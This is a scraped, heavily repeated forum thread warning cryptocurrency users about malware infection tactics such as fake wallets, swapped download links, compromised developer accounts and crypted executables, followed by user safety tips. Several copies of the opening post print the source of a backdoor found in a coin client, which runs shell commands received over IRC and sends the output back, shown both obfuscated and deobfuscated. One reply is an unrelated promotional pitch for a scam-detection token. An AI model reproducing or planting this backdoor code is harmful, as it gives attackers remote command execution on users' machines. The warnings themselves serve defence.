Yes the points you mentioned are very technical and clear but the last one is the key to the door of a safe trading era. You have to keep a device for daily activities that has no link with your device if trading it has a number of reasons.
Nowadays scamming has so much increased and the techniques are so much efficient that if you use a PC or mobile, it surely will be subjected to some malware. It has became almost impossible to avoid such kind of activities although anti malware companies are developing software but they're not meeting the requirements .So the best way to keep yourself safe is keep separate mobile for crypto use ans don't download unnecessary files and software.
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts (Read 681403 times)
November 14, 2023, 06:23:06 PM
My friend's account got swiped with keyboard malware virus. Just coz he did copy and paste. This scams ain't funny
August 05, 2023, 11:49:25 AM
I was intrigued by a scam which consists in revealing its mnemonic phrase on a forum, on twitter or other.
So I installed one of this wallet which indeed has funds. I observed what was happening and asked for explanations (to a bitcointalker): there are erc20 tokens in a wallet for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
Yes, you said the truth, almost the same experience as mine, those guys are very smart and are on the ground standby immediately they got a victim to move any funds in the wallet they got access to , but I can't really say if they are using a robot to run that shit. Even recently I have been receiving a phishing link via email, I don't take time to delete them when I see any of those links. So I installed one of this wallet which indeed has funds. I observed what was happening and asked for explanations (to a bitcointalker): there are erc20 tokens in a wallet for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
Dont download and run unknown files... use virustotal or any.run to check "unpopular" applications.
Dont sign transactions or connect web3 wallets such as metamask, trust wallet ect to unknown websites.
Do your due diligence, double check urls, cross check from here or social medias. Even when discords or twitter make announcements wait and cross check sometimes even those platforms get hacked and people use them to make announcement to fraudulent or malicious links that steal your funds.
Basically always think before you make a move with your crypto.
Again as many users said if you have large funds its best to keep them on a separate device that's not used for daily internet activities such as gaming ,downloading social media ect.
Dont sign transactions or connect web3 wallets such as metamask, trust wallet ect to unknown websites.
Do your due diligence, double check urls, cross check from here or social medias. Even when discords or twitter make announcements wait and cross check sometimes even those platforms get hacked and people use them to make announcement to fraudulent or malicious links that steal your funds.
Basically always think before you make a move with your crypto.
Again as many users said if you have large funds its best to keep them on a separate device that's not used for daily internet activities such as gaming ,downloading social media ect.
The usual Windows defender helps me a lot.
The main thing is not to download dubious files
The main thing is not to download dubious files
This one is actually pretty old, a couple years I'd say. Now it's more a meme than anything else. The malicious wallet signatures were and still are a pretty dangerous thing.
I was intrigued by a scam which consists in revealing its mnemonic phrase on a forum, on twitter or other.
So I installed one of this wallet which indeed has funds. I observed what was happening and asked for explanations (to a bitcointalker): there are erc20 tokens in a wallet for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
So I installed one of this wallet which indeed has funds. I observed what was happening and asked for explanations (to a bitcointalker): there are erc20 tokens in a wallet for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
April 18, 2023, 05:53:21 AM
I was intrigued by a scam which consists in revealing its mnemonic phrase on a forum, on twitter or other.
So I installed one of this wallet which indeed has funds. I observed what was happening and asked for explanations (to a bitcointalker): there are erc20 tokens in a wallet for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
So I installed one of this wallet which indeed has funds. I observed what was happening and asked for explanations (to a bitcointalker): there are erc20 tokens in a wallet for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
April 13, 2023, 02:28:03 PM
Common things to watch are obviously files, this can be from github, youtube video description links, gmail/email attachments and or esp torrents. Bound with malware and or stealers. Honestly id recommend keeping wallets separate from any computer you do downloads, surfing ect. Also with NFTs / Defi be careful to make sure what your signing with your wallet as it can be drained. Furthermore never interact with nfts/coins that just show up or were airdropped in your wallet as another member stated interacting with unknown "malicious" smart contracts can end up in a total transfer of your funds. STAY SAFE OUT THERE FOLKS!
March 22, 2023, 07:33:42 AM
There are other ways accounts get hacked, there are some fake projects online that would request for logins just to get intouch with how someone's password look like, hackers tried this passwords on other accounts of the victims like their gmail and blockchain accounts. This point also makes account vulnerable to attacks.
Things are getting sophisticated these days the way scammers are using to steal from different accounts and wallets. They can even clone a website like the big websites we have that have huge customers making it to look alike and then dropping the link to there cloned websites on the internet and to different dm so that once you click it and login to your account, they will save the password and have access to the account. We need to look out for different ways many of these scammers are using to steal from us. January 02, 2023, 07:03:01 PM
when I intent to send some funds the address is change some characters are omitted that's why when making transactions I used my phone instead of my pc, does anyone experience this too?..If this is a malware infection what should I do?
More and more people are writing on social networks about the fact that there are a lot of malware and viruses on MacBook M1. How can I detect and remove them? I may have such software installed.
I haven't heard of any crypto malware or viruses on the Macbook M1 models. They use different code (not x64), and a different OS (unix based) so they should not be able to get 99% of viruses by default. If you know of any I should look out for, do tell. I actually switched to a macbook to use Candle Chain and Polygon DApps on metamask and have had 0 hacks. I also moved my cold storage to a tangem wallet, which is safer IMO than a ledger. 
April 23, 2022, 06:10:41 PM
Wow, among all my time in the crypto space, I never even imagine a virus linked to a coin/token source code which can actually hijack ones wallet.. I should should be more careful the kind of coin ones transact this days on ward.
November 23, 2021, 08:32:55 AM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The purpose of this document is to make you understand the problem we are facing now with the growing popularity of the crypto markets. Cryptocurrencies and blockchain are a monstrosus topic and the applications of blockchain technologies came with a total lack of regulations in order to prevent illegal activities. Since the legal context is missing in Decentralized Finance built on top of blockchain technology, we are forced to be witnesses of DeFi rising scams.
DeFi rug pulls and exit scams formed 99% of all crypto frauds in 2020. DeFi-related hacks now make up more than 60% of the total hack and theft
volume in 2021, a large increase from only 25% in 2020.
Both exit scams and DeFi rug pulls are crypto frauds. Exit scams happen when cryptocurrency promoters disappear with investors' money during or after an initial coin offering (ICO). DeFi rug pulls are a new form of exit scam whereby crypto developers abandon a project and run away with investors' funds.
At the time of writing, between January-April 2021, DeFi scamsters raked in almost $83.4 million. Looking at the broader picture, almost 55% of all major cryptocurrency scams were DeFi hacks. That means out of a total theft amount of $432 million, $240 million can solely be attributed to DeFi. Even sophisticated investors, with a keen eye and understanding of financial details, can fall prey to such scams.
We built a platform for the decentralized finance industry to STOP the explosion of DeFi fraudulent projects that has left many individual investors burned. In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too?
Token utility use Cases
[/color]Simplified trading
In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too? DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.
Automatic scoring mechanism
The auto-scoring mechanism functionality is developed to analyze the various crypto smart contracts, transactions, holders, wallets, and behavior comparisons to give them a score based on well-defined criteria from blockchain experts. We cannot predict asset values on the market and it’s not in our scope of work but we can give you a score to help you make investment decisions. The experimental proof of concept results showed us a high correlation between the scores of the auto-scoring mechanism and the manual scoring. The second layer of human expert crowdsource will add a more precise score.
Rug pull and scam detection
Based on the blockchain enterprise subscription plans we have access to their professional API endpoints to fetch any smart contract data including pending transactions so we can easily instantly detect any movements of funds. As described in previous chapters, our detection mechanism once detected can send notifications To CSD Token holder when specific events trigger the mechanism.
Smart contracts monitoring
Related to the same mechanism, different techniques can be applied with defined patterns to continuously monitor such data in the blockchain.
Address monitor
The same principle can be applied also on user-defined “watchers” to keep an eye on Wallet addresses added into monitor service as a custom job with custom criteria.
Transactions track down
In our early stage when tests have been made as described in the proof of concept chapter we succeeded with no doubt not only to track down transactions but also we
detected blockchain shifts and came back to the original owner including associating transactions with fraud projects and repetitive transactions with other addresses related to the same practices.
Blockchain shift detection
As described above we are able to track down transactions outside of the blockchain boundaries so we can keep track not only in the current network. Following these criteria, if we identify abnormal activity or we link one address to fraud in one network, we already have a bad score applied to the address in the other end. The chances of not being accurate are pretty low.
Behaviour comparison
Starting from the moment when machine learning is getting outside of the testing lab stage as described in the proof of concept chapter, once into the production environment will add a layer of behavior comparison with past projects using AWS AI scalable instances and save data into our data storage for instant future reports.
User defined instant notifications
At the cost notification service providers, any CSD Token holder can spend part of their CSD into being notified when specific events trigger defined criteria. CSD Tokens spent on special services like this one will be transferred to the team wallet for operational costs and further improvements of cryptoscamdefence.com.
Smart contracts whitelisting/blacklisting
Terms such as “blacklist” and “whitelist” were commonly used within cybersecurity and infosec circles to simply designate what person or application can access a system or network (and which ones were denied). Our scoring mechanism once filled with the qualified confirmed result against the detected smart contract scam project will automatically blacklist in our data storage and flag it as a highly risky investment with the option for the contract owner to be whitelisted back once it will pass all stages of the validation process where also the community it is involved.
On top of this validation process being whitelisted by CryptoScamDefence gives contracts the badge of trust verified by cyptoscamdefence.com and community experts. Our scope of work is not only acting as arbitrage middleware but also based on our team experts together with CSD community voice and certified experts will provide enterprise-level audits to support newly created projects to get popular and trusted by the community and potential investors
More features to come
Crypto Scam Defence business model needs continuous improvement and focus on the community voice. Incremental changes into product feature it’s already on the checklist as continuous upgrades and implementation of any solid new features. Constant feedback from the community is an important aspect of the continuous improvement model. Open communication during every phase of executing an improvement is critical to both the final results of the improvement and to the maintenance and project managing costs. Making continuous improvement part of company culture is an excellent and cost-effective approach to tackling an organization’s most difficult challenges. When supported by improvement technology, results can be achieved quickly and success can be sustained over time.
November 16, 2021, 07:13:49 AM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
Good information. However, add some more to make it better. We need more information!
October 04, 2021, 05:34:50 PM
yes you are right Most of the airdrops are not legit and are just a simple strategy employed by hackers to take advantage of the information of airdrop hunters
it best to verify the authenticity of an airdrop from the official telegram of the project before participating.
Thousands of air drop that are being developed by developers are never legit and most time, they are used to steal data and increase the vulnerability of hacking people without them knowing what they have gotten there self into. Scammers can decide to create an air drop allowing innocent people to drop there information to get the airdrop and later using it against them. We should be aware of different tactics used by scammers. it best to verify the authenticity of an airdrop from the official telegram of the project before participating.
September 19, 2021, 04:27:59 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
So much malware now and more and more sophisticated we need to be wary and can you share some coin software or some project to keep people alert and stay away , because I think this is something we should all do and share together. "latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
September 14, 2021, 05:15:20 PM
Hello everyone ! 
I read this thread, and the question arose - are you really running mining, wallets and so on on a PC / laptop that is a storage of critical information? Seriously ?
I believe that if you own more or less significant funds, and "work" in this market, then you MUST provide yourself with the conditions of "information hygiene". Ideally - different devices for working with wallets / exchanges, separately for forums, etc., separately for mail / telegram / vibe, etc., and separately for mining, monitoring.
Antiviruses and other means of protection ALWAYS have relevance with a lag in relation to malicious solutions. First, a disease appears, then a medicine for it, but nothing else!
I read this thread, and the question arose - are you really running mining, wallets and so on on a PC / laptop that is a storage of critical information? Seriously ?
I believe that if you own more or less significant funds, and "work" in this market, then you MUST provide yourself with the conditions of "information hygiene". Ideally - different devices for working with wallets / exchanges, separately for forums, etc., separately for mail / telegram / vibe, etc., and separately for mining, monitoring.
Antiviruses and other means of protection ALWAYS have relevance with a lag in relation to malicious solutions. First, a disease appears, then a medicine for it, but nothing else!
August 20, 2021, 12:01:10 PM
Nowadays, malware infection attempts are very sophisticated, even when you exchange swaps from pankeswap from anonymous coins like VERA.. this is a coin where you just need to perform swap operations. to another coin immediately you will lose all your balance in the wallet. This is a new sophisticated trick that should be warned, you should be careful of strange coins being transferred to your wallet.
October 25, 2020, 07:16:27 AM
when the announcement board will be without the possibility of making self moderate announcements? this helps too much the scammers
This was suggested several times but seems not to be a priority in admin to-do list. Note that the altcoin board is considered a spam area and administration seems not to take things seriously here. Without to forget that a user is the first/only responsible about what he may accept to install into his device and those sticky threads in top boards are a rising flags warning us not to trust anybody and to do enough searches with links and softwares.
My device was increasingly misbehaving last week. I feared a malware has entered the device.
Sometimes there is no way to know if the device is really infected or not. One and only solution is to move important files in an exterior hard drive before formatting the device. Always take care if your device is all the time connected to internet.
September 15, 2020, 04:29:55 PM
when the announcement board will be without the possibility of making self moderate announcements? this helps too much the scammers
Jump to: